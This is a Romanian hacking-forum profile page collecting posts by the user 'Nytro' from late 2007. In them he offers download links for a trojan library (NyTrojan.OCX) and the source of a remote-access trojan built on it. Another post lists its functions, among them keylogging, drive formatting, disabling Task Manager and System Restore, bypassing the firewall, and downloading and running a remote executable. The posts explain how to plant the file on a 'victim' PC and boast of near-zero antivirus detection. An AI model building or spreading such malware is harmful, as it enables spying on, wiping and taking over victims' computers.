Jump to content

Nytro

Administrators
  • Posts

    18583
  • Joined

  • Last visited

  • Days Won

    643

Posts posted by Nytro

  1. Nu numei PE ... si txt sunt gasite ... De ex. c99-le il aveam txt ... si a fost gasit ca virus ... daca intram pe coolpics ... site ala cu virusul de dadeai massuri pe mess , nu ma lasa kasperky sa intru ... Ar trebui ca antivirusii sa gaseasca si .vbs , .bat ... fiiere care pot face rau ... insa ocx meu , singur nu poate face nici un rau , decat daca un exe , ii foloseste functiile ...

  2. Incerc sa copiez ocx in Form_initialize din fisier de resurse sa vad daca merge ... Si sunt sigur ca nu am muncit degeaba , 97 % nedetectabil ... de fapt nu vad de ce ar fi detectabil ... in cod nu gasesti decat NyTrojan1.OpenCDRom , NyTrojan1. ... etc ... deci trojanu propriu zis nu va fi detectabil , nu are cum , insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil...:)

  3. Un trojan , care foloseste toate functiile NyTrojan.OCX

    Deci folositi ocx : obtineti un trojan 97% UD , decat McAfee il gaseste , foarte usor de folosit functiile OCXului , faceti foarte usor Keylogger si multe altele .

    Sursa ESTE EXPLICATA , cred ca veti intelege toti :)

    Grafica e varza dar e nedetectabil : decat McAfee l-a gasit ca VB-BackDoor.a.gen .

    Download Source Code ( e si OCX acolo ) :

    http://rapidshare.com/files/80026164/NyTrojan_RAT_Source_Code.rar

    http://www.speedyshare.com/611620807.html

    http://www2.eushare.com/download.php?file=NyTrojan%20RAT%20Source%20Code.rar

    http://www.netdrive.ws/40906.html

    Screenshot :

    nytrojansccq7.jpg

    Server Scan :

    File Server.exe received on 12.30.2007 10:13:07 (CET)

    Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

    Result: 1/32 (3.13%)

    Client Scan :

    File Client.exe received on 12.30.2007 10:17:04 (CET)

    Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

    Result: 1/32 (3.13%)

    OCX Scan :

    File NyTrOjan.ocx received on 12.30.2007 10:20:40 (CET)

    Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

    Result: 0/32 (0%)

    Mai multe depre OCX :

    http://rstcenter.com/forum/nytrojan-ocx-t9594.rst

  4. ::::: NyTrojan OCX ::::::

    :::::: By Nytro :::::::

    ::: www.mortal-team.com :::

    File : NyTrojan.OCX

    Size : 84.0 KB

    Download :

    http://rapidshare.com/files/79649642/NyTrOjan.ocx

    http://www.speedyshare.com/590347578.html

    http://uploaded.to/?id=wltwes

    http://www2.eushare.com/download.php?file=NyTrOjan.ocx

    http://www.netdrive.ws/40441.html

    Functii :

    1) OpenCDRom

    2) CloseCDRom

    3) ShowTaskBar

    4) HideTaskBar

    5) HideMouse

    6) ShowMouse

    7) LockExe

    8) UnLockExe

    9) HideClock

    10) ShowClock

    11) HideStart

    12) ShowStart

    13) HideIcons

    14) ShowIcons

    15) DisableTaskManager

    16) EnableTaskManager

    17) EmptyFolder

    18) DesktopFolderFlood

    19) DesktopFolderDelete

    20) DisableSystemRestore

    21) EnableSystemRestore

    22) KillProcess

    23) AutoDownload

    24) SetStartButtonCaption

    25) AddToStartUp

    26) FreezeMouse

    27) StopFreezeMouse

    28) CrazyMouse

    29) StopCrazyMouse

    30) BeepFlood

    31) StopBeepFlood

    32) Abort

    33) LogOff

    34) ShutDown

    35) Restart

    36) Author

    37) OpenWebSite

    38) FormatDrive

    39) SwapMouseButtons

    40) StopSwapMouseButtons

    41) BypassWindowsFirewall

    42) TurnOffMonitor

    43) TurnOnMonitor

    44) StartKeylogging

    45) StopKeylogging

    46) Keylog

    De ce sa il foloiti ? Deoarece simplifica foarte mult munca ta :)

    Inca nu am facut un trojan cu el , revin cu el , o sa il fac

    E posibil , ca folosind aceste functii trojanul sa fie 100% UD

    Am incercat pe mine si au mers functiile , sa le incercati si voi

    si daca nu merge o functie sa imi ziceti .

    Aveti grija la numarul de parameri al functiilor , revin cu un edit

    in care spun ce face fiecare functie si cum se foloseste .

    L-am si scanat :

    File NyTrOjan.ocx received on 12.28.2007 11:25:48 (CET)

    Result: 0/32 (0%)

    Antivirus Version Last Update Result

    AhnLab- V3 2007.12.28.11 2007.12.28 -

    AntiVir 7.6.0.46 2007.12.28 -

    Authentium 4.93.8 2007.12.28 -

    Avast 4.7.1098.0 2007.12.27 -

    AVG 7.5.0.516 2007.12.27 -

    BitDefender 7.2 2007.12.28 -

    CAT-QuickHeal 9.00 2007.12.27 -

    ClamAV 0.91.2 2007.12.28 -

    DrWeb 4.44.0.09170 2007.12.28 -

    eSafe 7.0.15.0 2007.12.27 -

    eTrust-Vet 31.3.5408 2007.12.28 -

    Ewido 4.0 2007.12.27 -

    FileAdvisor 1 2007.12.28 -

    Fortinet 3.14.0.0 2007.12.28 -

    F-Prot 4.4.2.54 2007.12.28 -

    F-Secure 6.70.13030.0 2007.12.28 -

    Ikarus T3.1.1.15 2007.12.28 -

    Kaspersky 7.0.0.125 2007.12.28 -

    McAfee 5194 2007.12.27 -

    Microsoft 1.3109 2007.12.28 -

    NOD32v2 2752 2007.12.28 -

    Norman 5.80.02 2007.12.27 -

    Panda 9.0.0.4 2007.12.27 -

    Prevx1 V2 2007.12.28 -

    Rising 20.24.42.00 2007.12.28 -

    Sophos 4.24.0 2007.12.28 -

    Sunbelt 2.2.907.0 2007.12.28 -

    Symantec 10 2007.12.28 -

    TheHacker 6.2.9.172 2007.12.27 -

    VBA32 3.12.2.5 2007.12.26 -

    VirusBuster 4.3.26:9 2007.12.27 -

    Webwasher-Gateway 6.6.2 2007.12.28 -

    Additional information

    File size: 86016 bytes

    MD5: c561f7fc077e8e4c589f7aeacd9110b9

    SHA1: 6c1e3ce7485786fd792b8bde03280d621e9450c0

    PEiD: -

    Atentie : Daca folositi acest OCX e necesar fisierul pe calculatorul

    victimei . Cum se poate face asta ? Cel mai simplu , o arhiva SFX , facuta

    cu WinRAR . OCX-ul trebuie sa se afle in system32 .

    Cum il folositi in Visual Basic ? Trebuie inregistrat :

    Run >> regsvr32.exe C:\...\NyTrojan.OCX

    Sau Apasati CTRL + T in Visual Basic / Components , si dati Browse .

    Daca aveti probleme , sugestii etc , postati mai jos :)

    Functiile OCX-ului :

    1. DesktopFolderFlood = Creaza 1000 de foldere pe desktop

    2. DesktopFolderDelete = Sterge folderele

    3. EmptyFolder = Sterge toate fisierele dintr-un folder

    Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32"

    4. KillProcess = Inchide un proces

    Ex. NyTrojan1.KillProcess "winamp.exe"

    5. AutoDownload = Descarca un fisier

    Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1

    Parametri : 1. Direct link , 2. Locatia , 3. Ruleaza dupa ?

    1 - Ca sa ruleze dupa download

    0 - Ca sa nu ruleze dupa download

    6. SetStartButtonCaption = Seteaza numele butonului de start

    Ex. NyTrojan1.SetStartButtonCaption "xxx"

    7. AddToStartUp = Adauga la start-up un program

    Ex. NyTrojan1.AddToStartUp "C:\x.exe"

    8. BeepFlood = Beep-uri incontinuu

    Ex. NyTrojan1.BeepFlood "100"

    Parametrul reprezinta intervalul beep-urilor

    9. OpenWebSite = Deschide WebSite cu IE

    Ex. NyTrojan1.OpenWebSite "http://www.google.ro"

    10. Author = Un MsgBox

    11. FormatDrive = Formateaza o partitie

    Ex. NyTrojan1.FormatDrive "a"

    Info : Am incercat decat pe A:\ nu si pe C:\ sau D:\

    12. StartKeylogging = Porneste Keylogging-ul

    13. StopKeylogging = Opreste Keylogging-ul

    14. Keylog = Returneaza Keylog-ul , tastele apasate dupa folosirea

    functiei StartKeylogging .

  5. Cred ca merg fisierele trimise si folosind Input/Output , dar cred ca decat cele text , exe , poze ... cred ca pot fi trimise numai binar . Pot fi trimise si Input/Output , dar nu cred ca vor merge ...

    Eu voiam sa trimit un string cand se termina fiieru ca sa stiu cand sa opresc scrierea : Ex. While NData(2) <> "EOF" , ceva de genu , si If NData(2) = "EOF" Then Close #15 . In fine , gasesc eu o solutie :) , dar am alte treburi acum , trebuie sa termin ocx-ul , multumec pentru ajutor :)

  6. Dim a

    a = FreeFile

    FileCopy "C:\x.exe", a

    FileCopy a, "C:\y.exe"

    Copiaza x.exe in y.exe , merge am incercat dar nu poti trimite a , prin winsock , eu aia vreau

    M-am mai gandit putin : trimit data din server pana la end of file , iar cand ajunge la EOF , trimit un string "end" de exemplu . Si in client , scriu in fisier pana primec stringul "end" . Mai trimit din server i numele fisierului :)

    Mai trebuie sa incerc :)

  7. Nu a mers , am incercat in o gramada de feluri , am incercat sa mut un exe, ba imi cria un fisier de 0 bytes , ba imi scria mult prea greu , ba imi scria mai mult decat fisierul , scria si nu e oprea ... si mi se bloca Visual Basic ... de fiecare data ... imi poti face un exemplu de mutare al unui fiier asa te rog ?

  8. As avea si eu nevoie de putin ajutor :

    Cum se trimit fisiere prin winsock ?

    Ex : Deschid for binary si il trimit pana ajung la eof :

    Const yony = 8000 ' O folosesc pentru a trimite cate 8000 bytes

    Private Sub Command1_Click()

    Open "C:\YServer.txt" For Binary As #1 ' De exemplu

    While Not EOF(1)

    Data = Input(yony, #1) ' Si trimit data ( cate 8000 bytes ), din fisier , pana se termina fisierul ...

    Winsock1SendData "File|" + Data

    Wend

    End Sub

    Nu mai stiu cum sa scriu fisierul primit

    Winsock_DataArivall( ByVal ...

    Dim data

    Dim NData()

    Winsock1.GetData data

    NData = Split(data, "|") ' Impart in vector ce am primit : NData(0) = File , iar NData(1) va fi "data" trimis din server

    Cum il scriu ?

    Open "C:\x.txt" For Binary As #1

    While Not EOF(1)

    Print #1, NData(1) 'Scriem "data" din server intr-un fisier de la noi ...

    Wend

    Close #1

    ??????????????????????

    Nu mi-a mers nici cu Write

    Altceva : pentru FileListBox , ListBox , DirBox , cum vad ce "are" in calculator ? Daca trimit handlerul ( hwnd ) oare o merge ? Sau cum vad fisierele din calculator ?

    Astept raspuns , multumesc

  9. Deci functie OpenWebSite ? Ok pun ( in IE )

    Sa schimbe poza de pe desktop ... pai sa folosesc pozele din C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures ? Sau sa cer un argument cu locatia pozei ...

    Cand postez noua versiune postez si un trojan ( codul sursa ) cu toate facilitatile OCX-ului :)

    Altceva ? Nu prea am idei ..

×
×
  • Create New...